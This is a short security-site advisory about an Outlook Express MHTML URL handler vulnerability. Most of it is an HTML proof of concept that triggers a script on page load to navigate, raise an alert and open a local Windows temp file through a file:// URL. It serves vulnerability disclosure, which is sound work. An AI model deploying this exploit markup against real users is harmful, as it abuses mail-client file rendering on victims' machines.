Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

Microsoft Outlook Express MHTML URL Handler File Rendering Vulnerability

The following proof of concept has been provided by "http-equiv@excite.com" <http-equiv@malware.com>:

<html>
<head>
<title>malware.com</title>
<meta NAME="Author" CONTENT="malware.com">
<meta name="robots" content="noindex, nofollow">
</head>
<body onload=malware() style="behavior: url(#default#httpFolder);">
<script>
function malware(){
document.body.navigate("http://www.microsoft.com");alert("malware");
open("file://C%3A%5CWINDOWS%5CTemp%5Cwecerr.txt")
}
</script><br><br><br><br>
<center><image src="smile.gif"></center>







 

Privacy Statement
Copyright 2008, SecurityFocus